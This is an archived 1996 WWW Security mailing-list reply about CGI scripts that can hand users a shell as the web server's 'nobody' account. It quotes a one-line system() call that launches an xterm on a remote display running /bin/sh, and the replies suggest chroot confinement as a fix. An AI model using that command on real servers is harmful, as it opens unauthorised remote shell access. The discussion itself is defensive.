[3686] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Steve Neruda)
Wed Dec 4 11:20:58 1996
Date: Wed, 04 Dec 1996 09:20:15 -0500
From: Steve Neruda <nerudas@nationwide.com>
To: Brian Harvell <harvell@inet.net>
CC: Andrea Di Fabio <fabio@cs.odu.edu>, www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
Brian Harvell wrote:
>
> >
> > I was experimenting with cgi scripts when I came up with this idea:
> >
> > What if I have a cgi script which does the followin:
> > system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
> >
> > I can now pop an exterm on my display as nobody.
> > This way any user can gain access to the nobody account and
> > have fun with it...
> >
> > Has this been discussed anywhere?
> > Is there a fix out there?
> >
> Yeah don't do it. You can do things a lot worse if you wanted.
I really wish that more of the http servers ran in a true change root
enviroment (rather than limiting access by config like most servers
do). This would prevents people from getting to things like xterm
(though I suppose having Perl in your change rooted area still leaves
alot of tools toplay with).
SteveN
